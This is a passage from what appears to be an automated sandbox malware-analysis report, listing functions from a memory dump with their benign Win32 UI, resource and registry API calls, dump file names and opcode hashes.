Function 00215B66 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00215BD7
GetWindowRect.USER32(?,?), ref: 00215BE3
UnionRect.USER32(?,?,?), ref: 00215BEE
CopyRect.USER32(?,?), ref: 00215C18

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$CopyUnion
String ID:
API String ID: 8512700-0
Opcode ID: d428d26ee04a6815b678eab2e967ba042210c41a000c89e1618951c0c88ad767
Instruction ID: d181f021ad8d4f3d9fb7100a26f278c4499062c36cab0798776b9b21f17ebb98
Opcode Fuzzy Hash: d428d26ee04a6815b678eab2e967ba042210c41a000c89e1618951c0c88ad767
Instruction Fuzzy Hash: A721E8B2D10619DFCB10DFAAD9848EEFBF8FF98710B20456BE455E6110D6709A80CFA0

Function 002C1AB4 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: cbfd8487cc38a244dd088d3997f9ad064ccf10cc22fdabe1faec45a366230dca
Instruction ID: eb9a9765785442678a1ee80ade577315313af87a587b2a885aa142fc7efc1012
Opcode Fuzzy Hash: cbfd8487cc38a244dd088d3997f9ad064ccf10cc22fdabe1faec45a366230dca
Instruction Fuzzy Hash: 3511D371520245AFDF212FA1EC4AF9E3B68EB823A4F110218F9559B191EB70CD70DB50

Function 001CA4FD Relevance: 6.1, APIs: 4, Instructions: 62windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001CA504

Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88

__CxxThrowException@8.LIBCMT ref: 001CA549
FormatMessageW.KERNEL32(00001100,00000000,?,00000800,001CAFE2,00000000,00000000,?,001CAFE2,0031BC4C,00000004,001C8C28,001CAFE2,?,001CAFE2), ref: 001CA573
LocalFree.KERNEL32(001CAFE2,001C8C28,001CAFE2,?,001CAFE2), ref: 001CA5A1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
String ID:
API String ID: 1776251131-0
Opcode ID: 4599ce47bc9db097fc747358109619ebd7e0f8bb674b6cd6e4bf423850694f61
Instruction ID: 4aa738d8376f62de391e46bcf2c363406d561baef5b5eaeb77298f2f9a887f8b
Opcode Fuzzy Hash: 4599ce47bc9db097fc747358109619ebd7e0f8bb674b6cd6e4bf423850694f61
Instruction Fuzzy Hash: 70110D71900308EFDB069F60CC01FEA3BA8FF94B18F20C119F9298A290DB70CA508B91

Function 0029797C Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,00000005,00000005,?,00000000,?,00297C5F,00000005,?), ref: 0029799C
LoadResource.KERNEL32(?,00000000,?,00000000,?,00297C5F,00000005,?), ref: 002979B1
LockResource.KERNEL32(00000000,?,00000000,?,00297C5F,00000005,?), ref: 002979C3
GlobalFree.KERNEL32(?), ref: 002979FD

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Resource$FindFreeGlobalLoadLock
String ID:
API String ID: 3898064442-0
Opcode ID: a74b659e93d0b389713c3b5bf9efcd71b9e420dabd6787aa48c60940da0a3f7c
Instruction ID: 764658fb9d41e5abc86ea8eff09a5a7e03b88264849863d3d6dd1de2789e7d24
Opcode Fuzzy Hash: a74b659e93d0b389713c3b5bf9efcd71b9e420dabd6787aa48c60940da0a3f7c
Instruction Fuzzy Hash: 5A11C8352246469FDF215F25D848F2A7BE9EF90361B15842DF85987221DF30D811CF10

Function 001DF750 Relevance: 6.1, APIs: 4, Instructions: 61windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001DF761
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 001DF7A4
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 001DF7B0
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 001DF78F

Part of subcall function 0020BCC8: SendMessageW.USER32(?,00000234,00000000,00000000), ref: 0020BD43
Part of subcall function 0020BCC8: SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0020BD6A
Part of subcall function 0020BCC8: SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0020BD87
Part of subcall function 0020BCC8: SendMessageW.USER32(?,00000222,?,00000000), ref: 0020BD9E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$ParentRedrawWindow
String ID:
API String ID: 2139789815-0
Opcode ID: 09e891e602a4e94d087089b101d3b06a27e72c834b2cd104fe3ed56179552c22
Instruction ID: ec5738763b870c80fa558bf164cdc9bd80151c8471f463b0d1ddea3c6b15a580
Opcode Fuzzy Hash: 09e891e602a4e94d087089b101d3b06a27e72c834b2cd104fe3ed56179552c22
Instruction Fuzzy Hash: 1011A372600209BFDB216F51DCC9EBE7AAEFB80354F14443EF6465A3A0DB719D429B50

Function 0021BB3B Relevance: 6.1, APIs: 4, Instructions: 61windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 0021BB4F
_memset.LIBCMT ref: 0021BB6F
DestroyMenu.USER32(?), ref: 0021BB94

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$CreateDestroy_memset
String ID:
API String ID: 2954890696-0
Opcode ID: 9615f41a094707d182a37f905c86d9678cc0f97bd3a166cdc95ff22852540533
Instruction ID: 4238cdd5a6af2c0926aa8bc3da84b69e60416a2f52073327d44d070cc99bf634
Opcode Fuzzy Hash: 9615f41a094707d182a37f905c86d9678cc0f97bd3a166cdc95ff22852540533
Instruction Fuzzy Hash: 68116D30A14701AFDB629F35DC49BE7BAF9EF89305F10082DB85AD6150EF71AA50DB10

Function 002055F7 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001DCB9E: GetDlgItem.USER32(?,?), ref: 001DCBAF

GetWindowLongW.USER32(?,000000F0), ref: 00205614
GetWindowTextLengthW.USER32(?), ref: 00205641
GetWindowTextW.USER32(?,00000000,00000100), ref: 00205670
SendMessageW.USER32(?,0000014D,000000FF,?), ref: 00205691

Part of subcall function 001D0D9F: lstrlenW.KERNEL32(?,?,?), ref: 001D0DCB
Part of subcall function 001D0D9F: _memset.LIBCMT ref: 001D0DE9
Part of subcall function 001D0D9F: GetWindowTextW.USER32(00000000,?,00000100), ref: 001D0E03
Part of subcall function 001D0D9F: lstrcmpW.KERNEL32(?,?,?,?), ref: 001D0E15
Part of subcall function 001D0D9F: SetWindowTextW.USER32(00000000,?), ref: 001D0E21

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Text$ItemLengthLongMessageSend_memsetlstrcmplstrlen
String ID:
API String ID: 205973220-0
Opcode ID: cc9048d96af8bbfc8f789f45f3ff3a1c55f5042c1dfa3ef6917f36409fdf84d7
Instruction ID: 7f1dc8502bd26db94ac86a1ed1b8b27c566329fa564189974812dc7ee01337e5
Opcode Fuzzy Hash: cc9048d96af8bbfc8f789f45f3ff3a1c55f5042c1dfa3ef6917f36409fdf84d7
Instruction Fuzzy Hash: 6C119031010759BFCF01AFA4DC49EAA7B6AEF14320F584619F9694A1E1CB72D8A0DF44

Function 001D4326 Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 001D4363
RegCloseKey.ADVAPI32(00000000), ref: 001D436C
swprintf.LIBCMT ref: 001D4389
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 001D439A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: 752f544a17939da77669972c4c12af4c5c51c247f2d47ad520565f1643ca73d1
Instruction ID: 10722b034b6330544c6dd5c13ebe091e59d470ca70e28eaa45a354e60fb370d7
Opcode Fuzzy Hash: 752f544a17939da77669972c4c12af4c5c51c247f2d47ad520565f1643ca73d1
Instruction Fuzzy Hash: 3101A172540218BBDB109F64DC86FAB73BCAB48714F110416BA01A7280DB70FD159B64

Function 001FA321 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001FA344
GetWindowRect.USER32(?,?), ref: 001FA35D
WindowFromPoint.USER32(?,?), ref: 001FA369
PtInRect.USER32(?,?,?), ref: 001FA381

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: RectWindow$CursorFromPoint
String ID:
API String ID: 3445796726-0
Opcode ID: 381f8669b8f178857e2a8f3f67cc142d9d9b72b347d32fc18bb4e6b66be58daa
Instruction ID: bc0d46f57e055f620f01772954416b2875c55e31b3175fff42680ac256e51d17
Opcode Fuzzy Hash: 381f8669b8f178857e2a8f3f67cc142d9d9b72b347d32fc18bb4e6b66be58daa
Instruction Fuzzy Hash: A4110DB5D0020EAFCB119FA5D9848BFFBF9FF88340B60446AE64AE2110DB7499019F61

Function 001D7C5D Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000000C,?), ref: 001D7CAA
SetBkColor.GDI32(?,?), ref: 001D7CB4
GetSysColor.USER32(00000008), ref: 001D7CC4
SetTextColor.GDI32(?,?), ref: 001D7CCC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Color$ObjectText
String ID:
API String ID: 829078354-0
Opcode ID: dd8b350adfedc7fc5c9da3b3712222ff3a00598a4160a4ef712ecebaa8d6dcda
Instruction ID: 5ee7cc25e2fd2a4ec1f3038037497bca3c2a526a2744d83aacc6e47f438a02a3
Opcode Fuzzy Hash: dd8b350adfedc7fc5c9da3b3712222ff3a00598a4160a4ef712ecebaa8d6dcda
Instruction Fuzzy Hash: D9116D3161410AAFCB21EF689D89ABF77A8AB49311F150516FA1AD62D0EB30DD02CB60

Function 001CC709 Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,00000000,?), ref: 001CC745

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

GetFocus.USER32 ref: 001CC75B
GetParent.USER32(?), ref: 001CC769
SendMessageW.USER32(?,00000028,00000000,00000000), ref: 001CC77C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: f3ec5148460e8916219ef7d40ea4719f05546881b64db204ac6cf33b66fab15e
Instruction ID: fabcb3ff705fee6beb47a2305ec521d5f6d54d35034ee3be7fcd645de64410d7
Opcode Fuzzy Hash: f3ec5148460e8916219ef7d40ea4719f05546881b64db204ac6cf33b66fab15e
Instruction Fuzzy Hash: 75117071100704EFCB20AF65DC88D6ABBBAFBA4315710862DF14A5A960CB31EC40CED0

Function 00207457 Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 00207475
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0020748E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002074C1
DragFinish.SHELL32(?), ref: 002074E9

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: 6160d3533e134f4aeb47554a2e0f8c591a9c3efab2b9d73ba05479388b5adf5e
Instruction ID: a14db8a3902ba20239997c0a0722ca7a2ee7127d30c50fc6d594923a5dad28c7
Opcode Fuzzy Hash: 6160d3533e134f4aeb47554a2e0f8c591a9c3efab2b9d73ba05479388b5adf5e
Instruction Fuzzy Hash: 661130B1A4021CABCB10EB64DD8DFEEB7B9EF54311F10059AF119A7191CB74AA80CF60

Function 0020B1DA Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00000000), ref: 0020B1F7

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CountItemMenu
String ID:
API String ID: 1409047151-0
Opcode ID: 80a6d627f00c13b089ea750f9c34885eb6d0f6f3b0b573ac8d717d423026a0fe
Instruction ID: e73df6009d564dbcc476a7640d2b708a7f0327cf1f62bb28b551757f2d60503e
Opcode Fuzzy Hash: 80a6d627f00c13b089ea750f9c34885eb6d0f6f3b0b573ac8d717d423026a0fe
Instruction Fuzzy Hash: 6601D675530349BFDB224F64DCC897EBA69EB84B90F200425FC45E2191D770CDA19660

Function 001DA569 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 001DA579
GetTopWindow.USER32(00000000), ref: 001DA5B8
GetWindow.USER32(00000000,00000002), ref: 001DA5D6

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: fb058fb1d69807248f4904c606bfc173c0af35a944c564bac9da4cd783247ee8
Instruction ID: 622e18bf84a35475b9d885f8961ee93529d8f15e5068f02c1056339309b0490b
Opcode Fuzzy Hash: fb058fb1d69807248f4904c606bfc173c0af35a944c564bac9da4cd783247ee8
Instruction Fuzzy Hash: EB01E936001659BBCF129F95EC08EDF3A2ABF49350F954012FE1455260CB36CA61EFE2

Function 001F8C99 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 001F8CD4
DestroyWindow.USER32(?), ref: 001F8CF0
IsWindow.USER32(?), ref: 001F8D0F
DestroyWindow.USER32(?), ref: 001F8D1F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Destroy
String ID:
API String ID: 3707531092-0
Opcode ID: 01b559b8a442a8ad4614bd057918a37b7156371b5074e04754053e13c1e95b82
Instruction ID: 771eaea1ce759bfdb795d121da91762623c94ca466200f7f37190f0d717b620b
Opcode Fuzzy Hash: 01b559b8a442a8ad4614bd057918a37b7156371b5074e04754053e13c1e95b82
Instruction Fuzzy Hash: EE018C32205608EFEF215B64DC89FBABBA9FF50361F144629F65897150DF31AC10DA60

Function 001D965A Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 001D9667
GetTopWindow.USER32(00000000), ref: 001D967A

Part of subcall function 001D965A: GetWindow.USER32(00000000,00000002), ref: 001D96C1

GetTopWindow.USER32(?), ref: 001D96AA

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: dcbe993a917b29286837bafa4e7dea382f1900e40664308f37de809ac8bb8215
Instruction ID: 07d9b4b1a600462046b36e9d23180db6b9a9f764909baecb8487adf63b030404
Opcode Fuzzy Hash: dcbe993a917b29286837bafa4e7dea382f1900e40664308f37de809ac8bb8215
Instruction Fuzzy Hash: DE018636541655BBCF232F629C04EAF3E59AF653A0F014122FD0455320DF32D9119BE5

Function 0020B846 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 0020B86A
